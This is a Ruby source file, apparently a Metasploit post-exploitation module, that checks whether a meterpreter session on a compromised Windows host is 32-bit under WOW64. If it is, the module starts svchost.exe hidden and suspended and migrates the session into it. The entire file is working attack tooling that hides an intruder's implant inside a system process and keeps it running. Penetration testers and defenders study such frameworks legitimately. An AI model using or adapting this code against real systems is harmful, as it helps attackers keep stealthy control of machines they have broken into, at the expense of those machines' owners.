Path: blob/master/modules/post/windows/manage/archmigrate.rb
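##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Architecture Migrate',
        'Description' => %q{
          This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a
          new process with the correct architecture and migrates into that process.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Koen Riepe ([email protected])'],
        'Platform' => [ 'win' ],
        'Arch' => [ 'x86', 'x64' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_migrate
              stdapi_railgun_api
              stdapi_sys_process_execute
              stdapi_sys_process_getpid
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
        OptBool.new('FALLBACK', [true, 'If the selected migration executable does not exist fallback to a sysnative file', true]),
        OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have SYSTEM privileges', false])
      ]
    )
  end

  # Asks the OS (via railgun's IsWow64Process on the current process) whether
  # this meterpreter is a 32-bit process running under WOW64.
  #
  # @return [Boolean, nil] true when the Wow64Process out-parameter is non-zero,
  #   false when it is zero, and nil when railgun is unavailable (an error is
  #   printed in that case). Callers must not collapse nil into false: nil means
  #   "unknown", not "same architecture".
  def check_32_on_64
    # railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.
    session.railgun.kernel32.IsWow64Process(-1, 4)['Wow64Process'] != "\x00\x00\x00\x00"
  rescue StandardError
    print_error('Railgun not available, this module only works for binary meterpreters.')
    nil
  end

  # Returns the drive letter of the Windows directory (the part of %Windir%
  # before the first ':'), read through GetEnvironmentVariableA.
  #
  # @return [String] e.g. the "C" of "C:\Windows"
  def get_windows_loc
    apicall = session.railgun.kernel32.GetEnvironmentVariableA('Windir', 255, 255)['lpBuffer']
    apicall.split(':')[0]
  end

  # Starts +exe+ hidden and suspended, migrates the session into it, and
  # reports success only if the session's pid now equals the spawned pid.
  #
  # @param exe [String] full path of the executable to spawn and migrate into
  # @return [void]
  def migrate_into(exe)
    print_status("Starting new x64 process #{exe}")
    pid = session.sys.process.execute(exe, nil, { 'Hidden' => true, 'Suspended' => true }).pid
    print_good("Got pid #{pid}")
    print_status('Migrating..')
    session.core.migrate(pid)
    if pid == session.sys.process.getpid
      print_good('Success!')
    else
      print_error('Migration failed!')
    end
  end

  # Migrates into the configured EXE when the meterpreter architecture differs
  # from the OS architecture, falling back to the sysnative svchost.exe on the
  # Windows drive when FALLBACK is set and EXE does not exist.
  #
  # @return [void]
  def do_migrate
    wow64 = check_32_on_64
    # nil means the architecture could not be determined (railgun missing);
    # bail out instead of reporting "same architecture" as the original did.
    return if wow64.nil?

    unless wow64
      print_good('The meterpreter is the same architecture as the OS!')
      return
    end

    print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
    newproc = datastore['EXE']
    if exist?(newproc)
      migrate_into(newproc)
      return
    end

    print_error('The selected executable to migrate into does not exist')
    return unless datastore['FALLBACK']

    newproc = "#{get_windows_loc}:\\windows\\sysnative\\svchost.exe"
    if exist?(newproc)
      migrate_into(newproc)
    else
      print_error("Fallback executable #{newproc} does not exist either")
    end
  end

  # Entry point. Migration drops SYSTEM privileges (the new process runs as the
  # session user), so it is refused when running as SYSTEM unless IGNORE_SYSTEM
  # is set.
  #
  # @return [void]
  def run
    unless is_system?
      print_status('You are not running as SYSTEM. Moving on...')
      do_migrate
      return
    end

    if datastore['IGNORE_SYSTEM']
      print_error('You are running as SYSTEM! You will lose your privileges!')
      do_migrate
      return
    end

    print_error('You are running as SYSTEM! Aborting migration.')
  end
end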